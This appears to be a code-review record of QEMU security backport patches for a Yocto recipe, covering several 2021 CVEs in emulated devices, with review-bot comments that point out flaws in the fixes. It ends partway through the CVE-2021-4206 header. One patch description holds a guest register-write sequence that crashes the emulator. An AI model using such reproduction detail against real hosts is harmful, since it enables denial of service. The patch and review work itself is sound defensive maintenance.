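Review bot: `g_malloc0(npages * sizeof(void *))` still computes the allocation size with an unchecked multiplication, so zeroing the array does not help if `npages` is large enough to wrap. GLib's overflow-checked form avoids that: `ring->pages = g_malloc0_n(npages, sizeof(void *));`. Whether the caller already bounds `npages` is not visible from this hunk; pvrdma_ring_init starts and ends outside it.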
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
new file mode 100644
index 0000000000..6e7af8540a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
@@ -0,0 +1,80 @@
+From b68d13531d8882ba66994b9f767b6a8f822464f3 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 12:43:26 +0530
+Subject: [PATCH] CVE-2021-3638
+
+Upstream-Status: Backport [https://lists.nongnu.org/archive/html/qemu-devel/2021-09/msg01682.html]
+CVE: CVE-2021-3638
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+When building QEMU with DEBUG_ATI defined then running with
+'-device ati-vga,romfile="" -d unimp,guest_errors -trace ati\*'
+we get:
+
+ ati_mm_write 4 0x16c0 DP_CNTL <- 0x1
+ ati_mm_write 4 0x146c DP_GUI_MASTER_CNTL <- 0x2
+ ati_mm_write 4 0x16c8 DP_MIX <- 0xff0000
+ ati_mm_write 4 0x16c4 DP_DATATYPE <- 0x2
+ ati_mm_write 4 0x224 CRTC_OFFSET <- 0x0
+ ati_mm_write 4 0x142c DST_PITCH_OFFSET <- 0xfe00000
+ ati_mm_write 4 0x1420 DST_Y <- 0x3fff
+ ati_mm_write 4 0x1410 DST_HEIGHT <- 0x3fff
+ ati_mm_write 4 0x1588 DST_WIDTH_X <- 0x3fff3fff
+ ati_2d_blt: vram:0x7fff5fa00000 addr:0 ds:0x7fff61273800 stride:2560 bpp:32
+rop:0xff
+ ati_2d_blt: 0 0 0, 0 127 0, (0,0) -> (16383,16383) 16383x16383 > ^
+ ati_2d_blt: pixman_fill(dst:0x7fff5fa00000, stride:254, bpp:8, x:16383,
+y:16383, w:16383, h:16383, xor:0xff000000)
+ Thread 3 "qemu-system-i38" received signal SIGSEGV, Segmentation fault.
+ (gdb) bt
+ #0 0x00007ffff7f62ce0 in sse2_fill.lto_priv () at /lib64/libpixman-1.so.0
+ #1 0x00007ffff7f09278 in pixman_fill () at /lib64/libpixman-1.so.0
+ #2 0x0000555557b5a9af in ati_2d_blt (s=0x631000028800) at
+hw/display/ati_2d.c:196
+ #3 0x0000555557b4b5a2 in ati_mm_write (opaque=0x631000028800, addr=5512,
+data=1073692671, size=4) at hw/display/ati.c:843
+ #4 0x0000555558b90ec4 in memory_region_write_accessor (mr=0x631000039cc0,
+addr=5512, ..., size=4, ...) at softmmu/memory.c:492
+
+Commit 584acf34cb0 ("ati-vga: Fix reverse bit blts") introduced
+the local dst_x and dst_y which adjust the (x, y) coordinates
+depending on the direction in the SRCCOPY ROP3 operation, but
+forgot to address the same issue for the PATCOPY, BLACKNESS and
+WHITENESS operations, which also call pixman_fill().
+
+Fix that now by using the adjusted coordinates in the pixman_fill
+call, and update the related debug printf().
+---
+ hw/display/ati_2d.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/ati_2d.c b/hw/display/ati_2d.c
+index 4dc10ea7..692bec91 100644
+--- a/hw/display/ati_2d.c
++++ b/hw/display/ati_2d.c
+@@ -84,7 +84,7 @@ void ati_2d_blt(ATIVGAState *s)
+ DPRINTF("%d %d %d, %d %d %d, (%d,%d) -> (%d,%d) %dx%d %c %c\n",
+ s->regs.src_offset, s->regs.dst_offset, s->regs.default_offset,
+ s->regs.src_pitch, s->regs.dst_pitch, s->regs.default_pitch,
+- s->regs.src_x, s->regs.src_y, s->regs.dst_x, s->regs.dst_y,
++ s->regs.src_x, s->regs.src_y, dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ (s->regs.dp_cntl & DST_X_LEFT_TO_RIGHT ? '>' : '<'),
+ (s->regs.dp_cntl & DST_Y_TOP_TO_BOTTOM ? 'v' : '^'));
+@@ -180,11 +180,11 @@ void ati_2d_blt(ATIVGAState *s)
+ dst_stride /= sizeof(uint32_t);
+ DPRINTF("pixman_fill(%p, %d, %d, %d, %d, %d, %d, %x)\n",
+ dst_bits, dst_stride, bpp,
+- s->regs.dst_x, s->regs.dst_y,
++ dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ filler);
+ pixman_fill((uint32_t *)dst_bits, dst_stride, bpp,
+- s->regs.dst_x, s->regs.dst_y,
++ dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ filler);
+ if (dst_bits >= s->vga.vram_ptr + s->vga.vbe_start_addr &&
+--
+2.25.1
+
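Review bot: Passing the direction-adjusted `dst_x`/`dst_y` to `pixman_fill` fixes the coordinate mismatch, but nothing in these hunks checks that the destination rectangle stays inside VRAM, and the trace in the description shows a 16383x16383 fill. If the part of ati_2d_blt outside the hunks does not already reject rectangles that run past the end of VRAM, that check is still needed before the fill. Separately, the header replaces the upstream subject with `[PATCH] CVE-2021-3638`; keeping the upstream subject line would make the backport easier to trace.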
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
new file mode 100644
index 0000000000..50a49233d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
@@ -0,0 +1,41 @@
+From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 22 Jul 2021 09:27:56 +0200
+Subject: [PATCH] usbredir: fix free call
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+data might point into the middle of a larger buffer, there is a separate
+free_on_destroy pointer passed into bufp_alloc() to handle that. It is
+only used in the normal workflow though, not when dropping packets due
+to the queue being full. Fix that.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210722072756.647673-1-kraxel@redhat.com>
+
+CVE: CVE-2021-3682
+Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/usb/redirect.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 4ec9326e05..1ec909a63a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len,
+ if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) {
+ if (dev->endpoint[EP2I(ep)].bufpq_size >
+ dev->endpoint[EP2I(ep)].bufpq_target_size) {
+- free(data);
++ free(free_on_destroy);
+ return -1;
+ }
+ dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0;
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
new file mode 100644
index 0000000000..cdd9c38db9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
@@ -0,0 +1,67 @@
+From a114d6baedf2cccb454a46d36e399fec1bc3e1c0 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Wed, 18 Aug 2021 14:05:05 +0200
+Subject: [PATCH] uas: add stream number sanity checks.
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The device uses the guest-supplied stream number unchecked, which can
+lead to guest-triggered out-of-band access to the UASDevice->data3 and
+UASDevice->status3 fields. Add the missing checks.
+
+Fixes: CVE-2021-3713
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reported-by: Chen Zhe <chenzhe@huawei.com>
+Reported-by: Tan Jingguo <tanjingguo@huawei.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210818120505.1258262-2-kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/13b250b12ad3c59114a6a17d59caf073ce45b33a
+CVE: CVE-2021-3713
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/dev-uas.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/hw/usb/dev-uas.c b/hw/usb/dev-uas.c
+index 6d6d1073..0b8cd4dd 100644
+--- a/hw/usb/dev-uas.c
++++ b/hw/usb/dev-uas.c
+@@ -830,6 +830,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ }
+ break;
+ case UAS_PIPE_ID_STATUS:
++ if (p->stream > UAS_MAX_STREAMS) {
++ goto err_stream;
++ }
+ if (p->stream) {
+ QTAILQ_FOREACH(st, &uas->results, next) {
+ if (st->stream == p->stream) {
+@@ -857,6 +860,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ break;
+ case UAS_PIPE_ID_DATA_IN:
+ case UAS_PIPE_ID_DATA_OUT:
++ if (p->stream > UAS_MAX_STREAMS) {
++ goto err_stream;
++ }
+ if (p->stream) {
+ req = usb_uas_find_request(uas, p->stream);
+ } else {
+@@ -892,6 +898,11 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ p->status = USB_RET_STALL;
+ break;
+ }
++
++err_stream:
++ error_report("%s: invalid stream %d", __func__, p->stream);
++ p->status = USB_RET_STALL;
++ return;
+ }
+
+ static void usb_uas_unrealize(USBDevice *dev, Error **errp)
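Review bot: The `err_stream:` label is added directly after the closing brace of the block that ends in `break;`, with no `return;` in front of it, so every path that leaves that block normally falls into the error handler, logs "invalid stream" and overwrites `p->status` with `USB_RET_STALL`. Add `return;` on the line before `err_stream:` so only the two `goto err_stream;` sites reach it. The switch and the rest of usb_uas_handle_data start outside the hunks, so this reading assumes that brace closes the switch.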
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
new file mode 100644
index 0000000000..b291ade4e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
@@ -0,0 +1,124 @@
+From bedd7e93d01961fcb16a97ae45d93acf357e11f6 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Thu, 2 Sep 2021 13:44:12 +0800
+Subject: [PATCH] virtio-net: fix use after unmap/free for sg
+
+When mergeable buffer is enabled, we try to set the num_buffers after
+the virtqueue elem has been unmapped. This will lead several issues,
+E.g a use after free when the descriptor has an address which belongs
+to the non direct access region. In this case we use bounce buffer
+that is allocated during address_space_map() and freed during
+address_space_unmap().
+
+Fixing this by storing the elems temporarily in an array and delay the
+unmap after we set the the num_buffers.
+
+This addresses CVE-2021-3748.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: fbe78f4f55c6 ("virtio-net support")
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+https://github.com/qemu/qemu/commit/bedd7e93d01961fcb16a97ae45d93acf357e11f6
+CVE: CVE-2021-3748
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/net/virtio-net.c | 39 ++++++++++++++++++++++++++++++++-------
+ 1 file changed, 32 insertions(+), 7 deletions(-)
+
+diff --git a/hw/net/virtio-net.c b/hw/net/virtio-net.c
+index 16d20cdee52a..f205331dcf8c 100644
+--- a/hw/net/virtio-net.c
++++ b/hw/net/virtio-net.c
+@@ -1746,10 +1746,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ VirtIONet *n = qemu_get_nic_opaque(nc);
+ VirtIONetQueue *q = virtio_net_get_subqueue(nc);
+ VirtIODevice *vdev = VIRTIO_DEVICE(n);
++ VirtQueueElement *elems[VIRTQUEUE_MAX_SIZE];
++ size_t lens[VIRTQUEUE_MAX_SIZE];
+ struct iovec mhdr_sg[VIRTQUEUE_MAX_SIZE];
+ struct virtio_net_hdr_mrg_rxbuf mhdr;
+ unsigned mhdr_cnt = 0;
+- size_t offset, i, guest_offset;
++ size_t offset, i, guest_offset, j;
++ ssize_t err;
+
+ if (!virtio_net_can_receive(nc)) {
+ return -1;
+@@ -1780,6 +1783,12 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+
+ total = 0;
+
++ if (i == VIRTQUEUE_MAX_SIZE) {
++ virtio_error(vdev, "virtio-net unexpected long buffer chain");
++ err = size;
++ goto err;
++ }
++
+ elem = virtqueue_pop(q->rx_vq, sizeof(VirtQueueElement));
+ if (!elem) {
+ if (i) {
+@@ -1791,7 +1800,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ n->guest_hdr_len, n->host_hdr_len,
+ vdev->guest_features);
+ }
+- return -1;
++ err = -1;
++ goto err;
+ }
+
+ if (elem->in_num < 1) {
+@@ -1799,7 +1809,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ "virtio-net receive queue contains no in buffers");
+ virtqueue_detach_element(q->rx_vq, elem, 0);
+ g_free(elem);
+- return -1;
++ err = -1;
++ goto err;
+ }
+
+ sg = elem->in_sg;
+@@ -1836,12 +1847,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ if (!n->mergeable_rx_bufs && offset < size) {
+ virtqueue_unpop(q->rx_vq, elem, total);
+ g_free(elem);
+- return size;
++ err = size;
++ goto err;
+ }
+
+- /* signal other side */
+- virtqueue_fill(q->rx_vq, elem, total, i++);
+- g_free(elem);
++ elems[i] = elem;
++ lens[i] = total;
++ i++;
+ }
+
+ if (mhdr_cnt) {
+@@ -1851,10 +1863,23 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ &mhdr.num_buffers, sizeof mhdr.num_buffers);
+ }
+
++ for (j = 0; j < i; j++) {
++ /* signal other side */
++ virtqueue_fill(q->rx_vq, elems[j], lens[j], j);
++ g_free(elems[j]);
++ }
++
+ virtqueue_flush(q->rx_vq, i);
+ virtio_notify(vdev, q->rx_vq);
+
+ return size;
++
++err:
++ for (j = 0; j < i; j++) {
++ g_free(elems[j]);
++ }
++
++ return err;
+ }
+
+ static ssize_t virtio_net_do_receive(NetClientState *nc, const uint8_t *buf,
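Review bot: The new `err:` loop only calls `g_free(elems[j])`; those elements came from `virtqueue_pop` and are never detached, so their mappings appear to stay in place on every error exit. The in_num check in this same patch already pairs `virtqueue_detach_element` with `g_free`, and the error loop should do the same: `virtqueue_detach_element(q->rx_vq, elems[j], lens[j]);` before `g_free(elems[j]);`. The variable `err` and the label `err` also share a name, which is legal C but easy to misread.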
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
new file mode 100644
index 0000000000..43630e71fb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
@@ -0,0 +1,180 @@
+From 1938fbc7ec197e2612ab2ce36dd69bff19208aa5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 10 Oct 2022 17:44:41 +0530
+Subject: [PATCH] CVE-2021-3750
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=b9d383ab797f54ae5fa8746117770709921dc529 && https://git.qemu.org/?p=qemu.git;a=commit;h=3ab6fdc91b72e156da22848f0003ff4225690ced && https://git.qemu.org/?p=qemu.git;a=commit;h=58e74682baf4e1ad26b064d8c02e5bc99c75c5d9]
+CVE: CVE-2021-3750
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 55 +++++++++++++++++++++++++++++++-------
+ hw/intc/arm_gicv3_redist.c | 4 +--
+ include/exec/memattrs.h | 9 +++++++
+ 3 files changed, 56 insertions(+), 12 deletions(-)
+
+diff --git a/exec.c b/exec.c
+index 1360051a..10581d8d 100644
+--- a/exec.c
++++ b/exec.c
+@@ -39,6 +39,7 @@
+ #include "qemu/config-file.h"
+ #include "qemu/error-report.h"
+ #include "qemu/qemu-print.h"
++#include "qemu/log.h"
+ #if defined(CONFIG_USER_ONLY)
+ #include "qemu.h"
+ #else /* !CONFIG_USER_ONLY */
+@@ -3118,6 +3119,33 @@ static bool prepare_mmio_access(MemoryRegion *mr)
+ return release_lock;
+ }
+
++/**
+++ * flatview_access_allowed
+++ * @mr: #MemoryRegion to be accessed
+++ * @attrs: memory transaction attributes
+++ * @addr: address within that memory region
+++ * @len: the number of bytes to access
+++ *
+++ * Check if a memory transaction is allowed.
+++ *
+++ * Returns: true if transaction is allowed, false if denied.
+++ */
++static bool flatview_access_allowed(MemoryRegion *mr, MemTxAttrs attrs,
++ hwaddr addr, hwaddr len)
++{
++ if (likely(!attrs.memory)) {
++ return true;
++ }
++ if (memory_region_is_ram(mr)) {
++ return true;
++ }
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "Invalid access to non-RAM device at "
++ "addr 0x%" HWADDR_PRIX ", size %" HWADDR_PRIu ", "
++ "region '%s'\n", addr, len, memory_region_name(mr));
++ return false;
++}
++
+ /* Called within RCU critical section. */
+ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+ MemTxAttrs attrs,
+@@ -3131,7 +3159,10 @@ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+ bool release_lock = false;
+
+ for (;;) {
+- if (!memory_access_is_direct(mr, true)) {
++ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++ result |= MEMTX_ACCESS_ERROR;
++ /* Keep going. */
++ } else if (!memory_access_is_direct(mr, true)) {
+ release_lock |= prepare_mmio_access(mr);
+ l = memory_access_size(mr, l, addr1);
+ /* XXX: could force current_cpu to NULL to avoid
+@@ -3173,14 +3204,14 @@ static MemTxResult flatview_write(FlatView *fv, hwaddr addr, MemTxAttrs attrs,
+ hwaddr l;
+ hwaddr addr1;
+ MemoryRegion *mr;
+- MemTxResult result = MEMTX_OK;
+
+ l = len;
+ mr = flatview_translate(fv, addr, &addr1, &l, true, attrs);
+- result = flatview_write_continue(fv, addr, attrs, buf, len,
+- addr1, l, mr);
+-
+- return result;
++ if (!flatview_access_allowed(mr, attrs, addr, len)) {
++ return MEMTX_ACCESS_ERROR;
++ }
++ return flatview_write_continue(fv, addr, attrs, buf, len,
++ addr1, l, mr);
+ }
+
+ /* Called within RCU critical section. */
+@@ -3195,7 +3226,10 @@ MemTxResult flatview_read_continue(FlatView *fv, hwaddr addr,
+ bool release_lock = false;
+
+ for (;;) {
+- if (!memory_access_is_direct(mr, false)) {
++ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++ result |= MEMTX_ACCESS_ERROR;
++ /* Keep going. */
++ } else if (!memory_access_is_direct(mr, false)) {
+ /* I/O case */
+ release_lock |= prepare_mmio_access(mr);
+ l = memory_access_size(mr, l, addr1);
+@@ -3238,6 +3272,9 @@ static MemTxResult flatview_read(FlatView *fv, hwaddr addr,
+
+ l = len;
+ mr = flatview_translate(fv, addr, &addr1, &l, false, attrs);
++ if (!flatview_access_allowed(mr, attrs, addr, len)) {
++ return MEMTX_ACCESS_ERROR;
++ }
+ return flatview_read_continue(fv, addr, attrs, buf, len,
+ addr1, l, mr);
+ }
+@@ -3474,12 +3511,10 @@ bool address_space_access_valid(AddressSpace *as, hwaddr addr,
+ MemTxAttrs attrs)
+ {
+ FlatView *fv;
+- bool result;
+
+ RCU_READ_LOCK_GUARD();
+ fv = address_space_to_flatview(as);
+- result = flatview_access_valid(fv, addr, len, is_write, attrs);
+- return result;
++ return flatview_access_valid(fv, addr, len, is_write, attrs);
+ }
+
+ static hwaddr
+diff --git a/hw/intc/arm_gicv3_redist.c b/hw/intc/arm_gicv3_redist.c
+index 8645220d..44368e28 100644
+--- a/hw/intc/arm_gicv3_redist.c
++++ b/hw/intc/arm_gicv3_redist.c
+@@ -450,7 +450,7 @@ MemTxResult gicv3_redist_read(void *opaque, hwaddr offset, uint64_t *data,
+ break;
+ }
+
+- if (r == MEMTX_ERROR) {
++ if (r != MEMTX_OK) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "%s: invalid guest read at offset " TARGET_FMT_plx
+ "size %u\n", __func__, offset, size);
+@@ -507,7 +507,7 @@ MemTxResult gicv3_redist_write(void *opaque, hwaddr offset, uint64_t data,
+ break;
+ }
+
+- if (r == MEMTX_ERROR) {
++ if (r != MEMTX_OK) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "%s: invalid guest write at offset " TARGET_FMT_plx
+ "size %u\n", __func__, offset, size);
+diff --git a/include/exec/memattrs.h b/include/exec/memattrs.h
+index 95f2d20d..9fb98bc1 100644
+--- a/include/exec/memattrs.h
++++ b/include/exec/memattrs.h
+@@ -35,6 +35,14 @@ typedef struct MemTxAttrs {
+ unsigned int secure:1;
+ /* Memory access is usermode (unprivileged) */
+ unsigned int user:1;
++ /*
++ * Bus interconnect and peripherals can access anything (memories,
++ * devices) by default. By setting the 'memory' bit, bus transaction
++ * are restricted to "normal" memories (per the AMBA documentation)
++ * versus devices. Access to devices will be logged and rejected
++ * (see MEMTX_ACCESS_ERROR).
++ */
++ unsigned int memory:1;
+ /* Requester ID (for MSI for example) */
+ unsigned int requester_id:16;
+ /* Invert endianness for this page */
+@@ -66,6 +74,7 @@ typedef struct MemTxAttrs {
+ #define MEMTX_OK 0
+ #define MEMTX_ERROR (1U << 0) /* device returned an error */
+ #define MEMTX_DECODE_ERROR (1U << 1) /* nothing at that address */
++#define MEMTX_ACCESS_ERROR (1U << 2) /* access denied */
+ typedef uint32_t MemTxResult;
+
+ #endif
+--
+2.25.1
+
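Review bot: Nothing in this patch sets the new `memory` bit: `flatview_access_allowed` returns true whenever `attrs.memory` is clear, and the three files touched (exec.c, arm_gicv3_redist.c, memattrs.h) only add the check and the `MEMTX_ACCESS_ERROR` code. Unless another patch in the recipe makes the affected device issue its DMA with that attribute set, the guard stays inert and the `CVE: CVE-2021-3750` tag overstates what is fixed. The header should either name that companion change or state that this patch is infrastructure only. The doc comment for flatview_access_allowed also carries a stray `+` at the start of each line after `/**`, which looks like a backport artifact.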
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
new file mode 100644
index 0000000000..a1862f1226
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
@@ -0,0 +1,81 @@
+From 2c682b5975b41495f98cc34b8243042c446eec44 Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:36:16 -0700
+Subject: [PATCH] hw/nvme: fix CVE-2021-3929 MIME-Version: 1.0 Content-Type:
+ text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes CVE-2021-3929 "locally" by denying DMA to the iomem of the
+device itself. This still allows DMA to MMIO regions of other devices
+(e.g. doing P2P DMA to the controller memory buffer of another NVMe
+device).
+
+Fixes: CVE-2021-3929
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+
+Upstream-Status: Backport
+[https://gitlab.com/qemu-project/qemu/-/commit/736b01642d85be832385]
+CVE: CVE-2021-3929
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 23 +++++++++++++++++++++++
+ hw/block/nvme.h | 1 +
+ 2 files changed, 24 insertions(+)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index bda446d..ae9b19f 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,8 +60,31 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+ return addr >= low && addr < hi;
+ }
+
++static inline bool nvme_addr_is_iomem(NvmeCtrl *n, hwaddr addr)
++{
++ hwaddr hi, lo;
++
++ /*
++ * The purpose of this check is to guard against invalid "local" access to
++ * the iomem (i.e. controller registers). Thus, we check against the range
++ * covered by the 'bar0' MemoryRegion since that is currently composed of
++ * two subregions (the NVMe "MBAR" and the MSI-X table/pba). Note, however,
++ * that if the device model is ever changed to allow the CMB to be located
++ * in BAR0 as well, then this must be changed.
++ */
++ lo = n->bar0.addr;
++ hi = lo + int128_get64(n->bar0.size);
++
++ return addr >= lo && addr < hi;
++}
++
+ static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
++
++ if (nvme_addr_is_iomem(n, addr)) {
++ return NVME_DATA_TRAS_ERROR;
++ }
++
+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+ return 0;
+diff --git a/hw/block/nvme.h b/hw/block/nvme.h
+index 557194e..5a2b119 100644
+--- a/hw/block/nvme.h
++++ b/hw/block/nvme.h
+@@ -59,6 +59,7 @@ typedef struct NvmeNamespace {
+
+ typedef struct NvmeCtrl {
+ PCIDevice parent_obj;
++ MemoryRegion bar0;
+ MemoryRegion iomem;
+ MemoryRegion ctrl_mem;
+ NvmeBar bar;
+--
+1.8.3.1
+
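Review bot: `nvme_addr_is_iomem()` reads `n->bar0.addr` and `n->bar0.size`, but the only other change in this backport is the new `MemoryRegion bar0;` field in `NvmeCtrl`, and nothing visible initialises or maps that region. If the target tree still registers `n->iomem` as the BAR (not shown here), `bar0` stays zeroed, `lo == hi == 0`, and the new guard in `nvme_addr_read()` never rejects anything, so the backport would not close CVE-2021-3929. Either also backport the upstream change that introduces `bar0` as the container region, or compare against the region this version actually maps, e.g. `lo = n->iomem.addr; hi = lo + int128_get64(n->iomem.size);`. Separately, only `addr` is tested, so a transfer that starts below the range and runs into it by `size` is not caught; the body of `nvme_addr_read()` continues outside the hunk.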
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
new file mode 100644
index 0000000000..b1b5558647
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
@@ -0,0 +1,53 @@
+From b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 4 Nov 2021 17:31:38 +0100
+Subject: [PATCH] hw/scsi/scsi-disk: MODE_PAGE_ALLS not allowed in MODE SELECT
+ commands
+
+This avoids an off-by-one read of 'mode_sense_valid' buffer in
+hw/scsi/scsi-disk.c:mode_sense_page().
+
+Fixes: CVE-2021-3930
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: a8f4bbe2900 ("scsi-disk: store valid mode pages in a table")
+Fixes: #546
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8
+CVE: CVE-2021-3930
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/scsi-disk.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/hw/scsi/scsi-disk.c b/hw/scsi/scsi-disk.c
+index e8a547dbb7..d4914178ea 100644
+--- a/hw/scsi/scsi-disk.c
++++ b/hw/scsi/scsi-disk.c
+@@ -1087,6 +1087,7 @@ static int mode_sense_page(SCSIDiskState *s, int page, uint8_t **p_outbuf,
+ uint8_t *p = *p_outbuf + 2;
+ int length;
+
++ assert(page < ARRAY_SIZE(mode_sense_valid));
+ if ((mode_sense_valid[page] & (1 << s->qdev.type)) == 0) {
+ return -1;
+ }
+@@ -1428,6 +1429,11 @@ static int scsi_disk_check_mode_select(SCSIDiskState *s, int page,
+ return -1;
+ }
+
++ /* MODE_PAGE_ALLS is only valid for MODE SENSE commands */
++ if (page == MODE_PAGE_ALLS) {
++ return -1;
++ }
++
+ p = mode_current;
+ memset(mode_current, 0, inlen + 2);
+ len = mode_sense_page(s, page, &p, 0);
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
new file mode 100644
index 0000000000..80ad49e4ed
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
@@ -0,0 +1,89 @@
+From fa892e9abb728e76afcf27323ab29c57fb0fe7aa Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:17:12 +0200
